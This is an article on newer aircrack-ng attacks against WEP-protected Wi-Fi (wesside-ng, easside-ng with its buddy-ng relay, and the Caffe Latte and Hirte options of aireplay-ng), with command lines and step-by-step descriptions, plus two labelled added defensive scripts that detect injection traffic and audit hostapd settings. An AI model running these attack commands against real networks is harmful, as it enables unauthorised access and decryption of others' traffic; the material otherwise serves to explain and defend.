This is a continuation of the previous article about attacks on wireless access points with WEP protection.
In the second part of a series of articles on wireless security, we will look at some unconventional attacks on WEP.
In the latest (unstable) version of the aircrack-ng package, several programs have been added that implement new attacks on the WEP protocol.
The first one is wesside-ng. In essence, it is a script that automates the whole key-recovery process. The program has several options, but to get it working you only need to pass it the name of the wireless interface to use:
wesside-ng -i wlan0
The algorithm is the same as for a manual attack:
1. Hopping across the channels, a WEP network is found.
2. Fake authentication is performed. If MAC filtering is enabled, the adapter's address is changed to a valid one.
3. Authorization is completed.
4. A 128-bit key stream is recovered with the fragmentation attack.
5. Once an ARP packet has been captured, the IP address in its body is decrypted. From this data and the key stream, a forged ARP packet is built.
6. The network is flooded with forged ARP packets.
7. The PTW attack is run to compute the key.
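Steps 5 and 6 leave a recognisable trace on the air: the attacker holds a single recovered key stream, so every forged ARP frame carries the same WEP IV and the same size, and hundreds of them are sent per second. The following detector is an added example written from the defender's side; it is not part of the article or of aircrack-ng. It assumes a capture has already been reduced to one record per encrypted data frame (timestamp, transmitter MAC, BSSID, on-air length, 24-bit IV); the sample traffic and the thresholds are constructed.

```python
"""Flag stations whose traffic looks like WEP key-stream / ARP-replay injection.

Added example (not part of the article). It assumes a capture has already
been reduced to one record per encrypted data frame; the sample is constructed.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp in seconds
    src: str       # transmitter (station) MAC
    bssid: str
    length: int    # on-air frame length in bytes
    iv: str        # WEP IV as 6 hex digits


def constructed_sample():
    """Constructed traffic: one normal station and one injecting station."""
    bssid = "00:11:22:33:44:55"
    frames = []
    # Normal client: a frame every 100 ms, fresh IV and varying size each time.
    for i in range(20):
        frames.append(Frame(i * 0.1, "00:aa:bb:cc:dd:01", bssid, 120 + 7 * (i % 5), f"{i:06x}"))
    # Injector: 200 frames in 0.8 s, all the same size and the same IV, because the
    # attacker only holds one recovered key stream and reuses it for every forged ARP.
    for i in range(200):
        frames.append(Frame(i * 0.004, "00:aa:bb:cc:dd:02", bssid, 68, "3f2a91"))
    return frames


def detect_injection(frames, window=1.0, rate_threshold=50, iv_repeat_threshold=20):
    """Return one alert per station exceeding a frame-rate or IV-repeat threshold.

    Thresholds are assumptions for a small network; tune them per deployment.
    """
    by_src = defaultdict(list)
    for f in frames:
        by_src[f.src].append(f)

    alerts = []
    for src, fs in by_src.items():
        fs.sort(key=lambda f: f.ts)
        start = 0
        iv_counts = Counter()          # IV -> occurrences inside the current window
        peak_rate = peak_iv_repeats = 0
        for end, f in enumerate(fs):
            iv_counts[f.iv] += 1
            # Slide the window: drop frames older than `window` seconds.
            while fs[start].ts < f.ts - window:
                iv_counts[fs[start].iv] -= 1
                start += 1
            peak_rate = max(peak_rate, end - start + 1)
            peak_iv_repeats = max(peak_iv_repeats, iv_counts[f.iv])

        reasons = []
        if peak_rate > rate_threshold:
            reasons.append(f"{peak_rate} frames within {window}s")
        if peak_iv_repeats > iv_repeat_threshold:
            reasons.append(f"IV repeated {peak_iv_repeats} times within {window}s")
        if reasons:
            alerts.append({"src": src, "bssid": fs[0].bssid,
                           "peak_rate": peak_rate, "peak_iv_repeats": peak_iv_repeats,
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_injection(constructed_sample()):
        print(alert)
```

The IV-repeat check is the more robust of the two: a legitimate WEP station advances its IV on every frame, so tens of identical IVs from one MAC within a second is injected or replayed traffic regardless of how the rate threshold is tuned.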
The second new program is easside-ng. It allows you to connect to a WEP-protected wireless network without knowing the key itself.
[Figure: easside-ng operation scheme]
To carry out this attack, you must be able to run buddy-ng, the server-side component of easside-ng, on a host on the Internet. Both the wireless network and the computer you are attacking from must be able to reach buddy-ng. The scheme is quite simple:
1. A key stream of the maximum possible length (1504 bits) is recovered with the fragmentation attack.
2. By manipulating ARP packets, the network's addressing is learned.
3. A connection to the server is established and its operation is verified.
From then on, sending a packet to the network is easy: it is encrypted with the key stream and transmitted.
Decrypting a received packet is a little more involved. First, the information needed to deliver it to the server is prepended, and it is sent back into the wireless network. The access point decrypts the packet and forwards it to the Internet. The server, on receiving it, sends it back to you in cleartext.
This attack is very quiet and fast, because you do not need to send tens of thousands of packets, which distinguishes it favorably from the traditional attack on WEP.
Starting the program is very simple. On the external server:
buddy-ng
And on your computer:
easside-ng -f <network interface> -v <MAC of the target access point> -c <channel of the access point> -s <external server address>
The last innovation is a pair of new options in the aireplay-ng program. They allow attacks on clients that are outside the range of their own network, recovering the WEP key from the clients themselves:
aireplay-ng -6 -h <MAC of the network card> -D <network interface>, for the so-called "Caffe Latte" attack, and
aireplay-ng -7 -h <MAC of the network card> -D <network interface>, for the Hirte attack.
Both do the same job, but in slightly different ways. First, an ARP request from any client within range of the network card is awaited. Then a short key stream is recovered and an ARP request is built, to which the client will respond. Next, airodump-ng is run, packets are collected, and the key is computed with aircrack-ng.
Finally, it is worth noting that these new attacks only make it easier to break into WEP-protected Wi-Fi networks. The only sensible option today is WPA2, in PSK or Enterprise mode.
In the next article, we will examine in detail the possibilities of attacking WPA-protected networks, including a new attack on WPA-TKIP, and try to answer the question of whether WPA really can give you complete confidence in the security of your wireless network.
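Since the conclusion above comes down to "no WEP, WPA2 only", the practical follow-up for an administrator is to check the access point configuration for exactly those settings. The script below is an added example from the defender's side, not part of the article; it audits a hostapd-style key=value configuration using hostapd's real option names (wpa, wpa_key_mgmt, rsn_pairwise, wpa_pairwise, wep_key0..3, wep_default_key, auth_algs, wpa_passphrase, wpa_psk, wpa_psk_file). The two configurations it ships with are constructed: a legacy WEP setup and the same network moved to WPA2-PSK with CCMP. It also flags TKIP, which the teaser for the next article hints at.

```python
"""Audit a hostapd configuration for WEP and weak WPA settings.

Added example (not part of the article). Option names are hostapd's own;
the two configurations below are constructed.
"""

# Constructed: a legacy access point still running WEP with shared-key auth.
WEAK_HOSTAPD_CONF = """
interface=wlan0
ssid=corp-legacy
channel=6
# bit 1 = open system, bit 2 = shared key
auth_algs=3
wep_default_key=0
wep_key0=0123456789
"""

# Constructed: the same AP moved to WPA2-PSK with CCMP only.
FIXED_HOSTAPD_CONF = """
interface=wlan0
ssid=corp
channel=6
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=CONSTRUCTED-EXAMPLE-PASSPHRASE
"""


def parse_hostapd_conf(text):
    """hostapd.conf is one key=value per line; lines starting with # are comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd(conf):
    """Return (code, message) findings; an empty list means nothing weak was found."""
    findings = []
    if any(k.startswith("wep_key") or k == "wep_default_key" for k in conf):
        findings.append(("WEP", "WEP keys configured; WEP is broken, remove all wep_* options"))
    try:
        if int(conf.get("auth_algs", "1")) & 2:
            findings.append(("SHARED_KEY_AUTH", "auth_algs allows WEP shared-key authentication; set auth_algs=1"))
    except ValueError:
        findings.append(("BAD_AUTH_ALGS", "auth_algs is not an integer"))

    wpa = conf.get("wpa", "0")
    if wpa == "0":
        findings.append(("NO_WPA2", "wpa=0: no WPA/WPA2, the network is open or WEP-only; set wpa=2"))
        return findings
    if wpa == "1":
        findings.append(("WPA1_ONLY", "wpa=1 enables WPA (TKIP-era) only; set wpa=2"))
    elif wpa == "3":
        findings.append(("MIXED_MODE", "wpa=3 keeps WPA enabled alongside WPA2; prefer wpa=2"))

    # hostapd falls back from rsn_pairwise to wpa_pairwise, so inspect both.
    ciphers = set(conf.get("rsn_pairwise", "").split()) | set(conf.get("wpa_pairwise", "").split())
    if "TKIP" in ciphers:
        findings.append(("TKIP", "TKIP pairwise cipher allowed; use rsn_pairwise=CCMP"))
    if "CCMP" not in ciphers:
        findings.append(("NO_CCMP", "CCMP not explicitly enabled; set rsn_pairwise=CCMP"))

    # WPA-PSK is hostapd's documented default for wpa_key_mgmt.
    key_mgmt = conf.get("wpa_key_mgmt", "WPA-PSK").split()
    if "WPA-PSK" in key_mgmt and not any(k in conf for k in ("wpa_passphrase", "wpa_psk", "wpa_psk_file")):
        findings.append(("NO_PSK", "WPA-PSK selected but no passphrase or PSK configured"))
    return findings


def audit_text(text):
    """Convenience wrapper: parse and audit a configuration given as text."""
    return audit_hostapd(parse_hostapd_conf(text))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_HOSTAPD_CONF), ("fixed", FIXED_HOSTAPD_CONF)):
        print(name, audit_text(text))
```

Run against the constructed legacy configuration it reports the WEP keys, the shared-key authentication and the absence of WPA2; the corrected configuration yields no findings.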
Author: Kozhara Yaroslav, Glaive Security Group